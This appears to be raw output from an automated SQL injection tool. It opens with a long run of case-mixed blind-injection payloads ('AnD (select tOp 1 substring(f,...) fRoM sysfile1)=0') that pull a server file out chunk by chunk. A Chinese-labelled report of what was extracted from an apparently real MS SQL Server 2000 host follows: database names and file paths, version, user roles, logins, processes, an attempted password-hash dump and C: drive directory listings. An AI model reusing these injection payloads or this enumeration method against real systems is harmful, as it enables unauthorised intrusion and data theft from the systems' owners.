sysfile1)=0  1  AnD (select tOp 1 substring(f,155801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,156001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,156201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,156401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,156601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,156801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,157001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,157201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,157401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,157601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,157801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,158001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,158201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,158401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,158601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,158801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,159001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,159201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,159401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,159601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,159801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,160001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,160201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,160401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,160601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,160801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,161001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,161201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,161401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,161601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,161801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,162001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,162201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,162401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,162601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,162801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,163001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,163201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,163401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,163601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,163801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,164001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,164201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,164401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,164601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,164801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,165001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,165201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,165401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,165601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,165801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,166001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,166201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,166401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,166601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,166801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,167001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,167201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,167401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,167601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,167801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,168001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,168201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,168401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,168601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,168801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,169001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,169201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,169401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,169601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,169801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,170001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,170201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,170401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,170601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,170801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,171001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,171201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,171401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,171601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,171801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,172001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,172201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,172401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,172601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,172801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,173001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,173201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,173401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,173601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,173801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,174001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,174201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,174401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,174601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,174801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,175001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,175201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,175401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,175601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,175801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,176001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,176201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,176401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,176601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,176801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,177001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,177201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,177401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,177601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,177801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,178001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,178201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,178401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,178601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,178801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,179001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,179201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,179401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,179601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,179801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,180001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,180201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,180401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,180601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,180801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,181001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,181201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,181401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,181601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,181801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,182001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,182201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,182401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,182601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,182801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,183001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,183201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,183401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,183601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,183801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,184001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,184201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,184401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,184601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,184801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,185001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,185201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,185401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,185601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,185801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,186001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,186201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,186401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,186601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,186801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,187001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,187201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,187401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,187601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,187801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,188001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,188201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,188401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,188601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,188801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,189001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,189201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,189401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,189601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,189801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,190001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,190201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,190401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,190601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,190801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,191001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,191201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,191401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,191601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,191801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,192001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,192201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,192401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,192601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,192801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,193001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,193201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,193401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,193601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,193801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,194001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,194201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,194401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,194601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,194801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,195001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,195201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,195401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,195601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,195801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,196001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,196201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,196401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,196601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,196801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,197001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,197201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,197401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,197601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,197801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,198001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,198201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,198401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,198601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,198801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,199001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,199201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,199401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,199601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,199801,200) fRoM sysfile1)=0  

■数据库信息:============================================================
- 数据库名：YGENT
- 用户名：dbo
- 版本：Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

- 服务器名：SERVER
- 服务名：MSSQLSERVER
- 系统用户名：ygent

 ・当前用户权限：
sysadmin(sa): 0
dbcreator): 0
bulkadmin: 0
diskadmin: 0
serveradmin: 0
public: 1
db_owner: 1
db_backupoperator: 0
db_datawriter: 0

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
BGH	C:\Program Files\Microsoft SQL Server\MSSQL\data\BGH_Data.MDF	
KSIE	C:\Program Files\Microsoft SQL Server\MSSQL\Data\KSIE_Data.MDF	
master	C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf	
model	C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf	
msdb	C:\Program Files\Microsoft SQL Server\MSSQL\data\msdbdata.mdf	
Muziq	C:\Program Files\Microsoft SQL Server\MSSQL\Data\Muziq.mdf	
Northwind	C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.mdf	
pubs	C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf	
tempdb	C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf	
YGENT	C:\Program Files\Microsoft SQL Server\MSSQL\Data\YGENT_Data.MDF	

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
dbo			08  6 2000  1:27AM	
guest	.	.	08  6 2000  1:27AM	

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5
Internet Information Services	sleeping	SERVER	760	AWAITING COMMAND		
Internet Information Services	runnable	SERVER	2432	SELECT		
Internet Information Services	runnable	SERVER	2432	SELECT		
Internet Information Services	runnable	SERVER	2432	SELECT		
	sleeping			CHECKPOINT SLEEP		

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

Dir of C:: 

AGSPay40\
Documents and Settings\
FPSE_search\
Inetpub\
Intel\
Program Files\
RECYCLER\
SQL2KSP4\
System Volume Information\
TempEI4\
WINDOWS\
wmpub\
AUTOEXEC.BAT
CONFIG.SYS
lan.log
realtek.log
RHDSetup.log

Dir of C:\Intel: 

Logs\

Dir of C:\Intel\Logs: 

IntelChipset.log
IntelGFX.log

